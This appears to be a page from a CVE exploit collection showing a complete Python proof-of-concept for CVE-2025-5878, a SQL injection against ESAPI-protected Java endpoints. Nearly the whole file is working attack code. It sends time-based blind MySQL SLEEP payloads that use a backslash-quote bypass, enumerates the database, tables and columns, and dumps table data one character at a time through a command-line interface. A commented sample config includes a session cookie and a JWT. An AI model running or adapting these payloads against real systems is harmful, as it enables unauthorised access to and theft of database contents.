5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / esapi-sqlinjection.py PY
import argparse
import re
import sys

import requests
import time
import string


# 目标配置
# url = "http://192.168.122.1:8888/vulnapi/sqli/jdbc/safe3"
# param_name = "id"
# cookies = {"JSESSIONID=70D53458ADD0D92F6BE69DC0F13DF22F;JWT_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3ODA2NDY5NDgsImV4cCI6MTc4MDczMzM0OCwidXNlcm5hbWUiOiJhZG1pbiJ9.FLQCMsMxCgYOvMoU5k7KDLlv-jIgBw8zKzDrwEUBTR4"}


# 延时判断阈值(秒)
# self.sleep_time = 5
# timeout = 3

class ESAPISQLExploit:
    def __init__(self, url, cookies, headers):
        self.param_name = self._extract_param_name(url)
        self.url = url.split('?')[0]
        self.cookies = self._parse_cookies(cookies) if cookies else {}
        self.headers = headers
        self.timeout = 3
        self.sleep_time = 5

    def _extract_param_name(self,url):
        """提取 ? 和 = 之间的参数名"""
        # 方法1:正则表达式
        match = re.search(r'\?([^=]+)=', url)
        if match:
            return match.group(1)

    def _parse_cookies(self, cookie_str):
        """
        解析cookie字符串为字典

        Args:
            cookie_str: "name1=value1; name2=value2" 格式的字符串

        Returns:
            dict: cookie字典
        """
        cookies = {}
        if isinstance(cookie_str, str):
            # 分割多个cookie
            for item in cookie_str.split(';'):
                item = item.strip()
                if '=' in item:
                    key, value = item.split('=', 1)
                    cookies[key.strip()] = value.strip()
        elif isinstance(cookie_str, dict):
            # 如果已经是字典,直接使用
            cookies = cookie_str
        return cookies

    def has_sleep(self,payload):

        """判断payload是否触发延时"""
        paramsDouble = {self.param_name: payload}
        start = time.time()
        try:
            response = requests.get(url=self.url, params = paramsDouble, cookies = self.cookies, headers=self.headers, timeout=self.timeout)

            elapsed = time.time() - start
            return elapsed >= self.sleep_time
        except requests.Timeout:
            # 超时也可能表示触发延时,根据实际情况判断
            return True

    def calc_length(self):
        lengthTemp = 0
        for i in range(1, 50):
            # 示例payload:MySQL
            payload = f"1\\' AND IF(length(database())>{i},0,SLEEP({self.sleep_time}))-- -"
            # PostgreSQL 版本
            # payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -"
            if self.has_sleep(payload):
                print(f"\n数据库长度{i}")
                lengthTemp = i
                break

        return lengthTemp

    def inject_database_name(self, lengthTemp):
        """获取数据库名"""
        db_name = ""
        print("[*] 开始获取数据库名...")

        for i in range(1, lengthTemp + 1):
            for c in range(45,123):
                # 示例payload:MySQL
                payload = f"1\\' AND IF(ascii(SUBSTRING(database(),{i},1))>{c},0,SLEEP({self.sleep_time}))-- -"
                # PostgreSQL 版本
                # payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -"

                print(f"\r[*] 正在猜测第 {i} 位: {chr(c)}", end="")

                if self.has_sleep(payload):
                    db_name += chr(c)
                    print(f"\n[+] 第 {i} 位: {chr(c)}")
                    break

        print(f"\n[+] 数据库名: {db_name}")
        return db_name


    def inject_table_name(self, db_name):
        """获取表名"""
        tables = []
        print(f"\n[*] 开始获取 {db_name} 库的表名...")

        # 先获取表数量
        table_count = 0
        for i in range(1, 20):
            payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\"{db_name}\")>={i},SLEEP({self.sleep_time}),0)-- -"
            if self.has_sleep(payload):
                table_count = i
            else:
                break
        print(f"[+] 共发现 {table_count} 个表")

        # 逐个获取表名
        for t in range(1, table_count + 1):
            table_name = ""
            for i in range(1, 50):
                for c in string.ascii_lowercase + string.digits + "_":
                    payload = f"1\\' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=\"{db_name}\" LIMIT {t - 1},1),{i},1)=\"{c}\",SLEEP({self.sleep_time}),0)-- -"
                    print(f"\r[*] 第 {t} 个表: {table_name}{c}", end="")

                    if self.has_sleep(payload):
                        table_name += c
                        print(f"\n[+] 第 {t} 个表第 {i} 位: {c}")
                        break
                else:
                    break
            tables.append(table_name)

        print(f"\n[+] 表名列表: {tables}")
        return tables


    def inject_column_name(self, database_name, table_name):
        """获取列名"""
        columns = []
        print(f"\n[*] 开始获取 {table_name} 表的列名...")

        # 获取列数量
        col_count = 0
        for i in range(1, 30):
            payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\")>={i},SLEEP({self.sleep_time}),0)-- -"
            if self.has_sleep(payload):
                col_count = i
            else:
                break
        print(f"[+] 共发现 {col_count} 个列")

        # 逐个获取列名
        for c in range(1, col_count + 1):
            col_name = ""
            for i in range(1, 50):
                for ch in string.ascii_lowercase + string.digits + "_":
                    payload = f"1\\' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\" LIMIT {c - 1},1),{i},1)=\"{ch}\",SLEEP({self.sleep_time}),0)-- -"
                    print(f"\r[*] 第 {c} 个列: {col_name}{ch}", end="")

                    if self.has_sleep(payload):
                        col_name += ch
                        print(f"\n[+] 第 {c} 个列第 {i} 位: {ch}")
                        break
                else:
                    break
            columns.append(col_name)

        print(f"\n[+] 列名列表: {columns}")
        return columns


    def inject_data(self, table_name, column_name):
        """获取数据"""
        data_list = []
        print(f"\n[*] 开始获取 {table_name}.{column_name} 数据...")

        # 先获取行数
        row_count = 0
        for i in range(1, 100):
            payload = f"1\\' AND IF((SELECT COUNT(*) FROM {table_name})>={i},SLEEP({self.sleep_time}),0)-- -"
            if self.has_sleep(payload):
                row_count = i
            else:
                break
        print(f"[+] 共发现 {row_count} 行数据")

        # 逐个获取每行的数据长度和数据
        for r in range(1, row_count + 1):
            # 先获取该行数据的长度
            data_len = 0
            for i in range(1, 256):
                payload = f"1\\' AND IF((SELECT LENGTH({column_name}) FROM {table_name} LIMIT {r - 1},1)<={i},SLEEP({self.sleep_time}),0)-- -"
                if self.has_sleep(payload):
                    data_len = i
                    break

            print(f"[*] 第 {r} 行数据长度为: {data_len}")

            # 逐位获取数据
            data = ""
            for i in range(1, data_len + 1):
                for ch in string.printable:
                    if ch == "'":
                        continue
                    # 使用 ASCII 码判断(更稳定)
                    payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))={ord(ch)},SLEEP({self.sleep_time}),0)-- -"
                    print(f"\r[*] 第 {r} 行数据: {data}{ch}", end="")

                    if self.has_sleep(payload):
                        data += ch
                        break
                else:
                    # 如果找不到,尝试二分法搜索ASCII
                    low, high = 32, 126
                    while low <= high:
                        mid = (low + high) // 2
                        payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))>={mid},SLEEP({self.sleep_time}),0)-- -"
                        if self.has_sleep(payload):
                            low = mid + 1
                        else:
                            high = mid - 1
                    ascii_val = high
                    if ascii_val >= 32:
                        data += chr(ascii_val)
                        print(f"\r[*] 第 {r} 行数据: {data}", end="")
                    break
            data_list.append(data)
            print(f"\n[+] 第 {r} 行数据: {data}")
        print(f"\n[+] 数据为: {data_list}")
        return data_list


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ESAPI SQLinjection CVE-2025-5878 Exploit")
    parser.add_argument("-u", "--url", required=True, help="base URL (ej: http://target.com:3000?id=1)")
    parser.add_argument("-c", "--cookie", required=True,help="Cookie字符串,格式: 'name1=value1; name2=value2'")
    parser.add_argument("--dbs", action="store_true", help="获取数据库名称")
    parser.add_argument("--tables", action="store_true", help="获取表名")
    parser.add_argument("--columns", action="store_true", help="获取指定表的列名(需要先执行-T)")
    parser.add_argument("-D", "--db", help="指定数据库名称")
    parser.add_argument("-T", "--table", help="指定获取表名")
    parser.add_argument("-C", "--column", help="获取指定表的列名(需要先执行-T)")
    parser.add_argument("--dump",  action="store_true",help="导出指定表的数据(格式: 表名,列名1,列名2)")
    args = parser.parse_args()

    # 验证URL格式
    if not args.url or '?' not in args.url or '=' not in args.url:
        print("[-] 错误:URL必须包含 '?' 和 '=' 参数")
        print(f"    示例: {args.url}?id=1")
        sys.exit(1)
    headers = {"User-Agent": "Mozilla/5.0"}

    # 初始化exploit对象
    exploit = ESAPISQLExploit(url= args.url, cookies= args.cookie, headers=headers)

    # 显示目标信息
    print(f"[*] 目标URL: {args.url}")

    if args.cookie:
        print(f"[*] 使用Cookie: {args.cookie}")

    # 执行顺序检查:必须先执行-T才能执行-C
    if args.column and not args.table:
        print("[-] 错误:必须先使用 -T 获取表名,才能使用 -C 获取列名")
        print("    正确顺序: python exploit.py -u <url> -T  # 先获取表名")
        print("              python exploit.py -u <url> -C <table_name>  # 再获取列名")
        sys.exit(1)
    length = 10
    # 执行命令
    if args.dbs:
        length = exploit.calc_length()
        exploit.inject_database_name(length)
    else:
        if args.db is not None:
            if args.tables:
                exploit.inject_table_name(args.db)
            else:
                if args.table is not None:

                    if args.columns:
                        exploit.inject_column_name(args.db, args.table)
                    else:
                        if args.column is not None:

                            if args.dump:
                                exploit.inject_data(args.table, args.column)
                        else:
                            print("请先爆破列名或指定列名")
                else:
                    print("请先爆破表名或指定表库名")
        else:
            print("请先爆破数据库名或指定数据库名")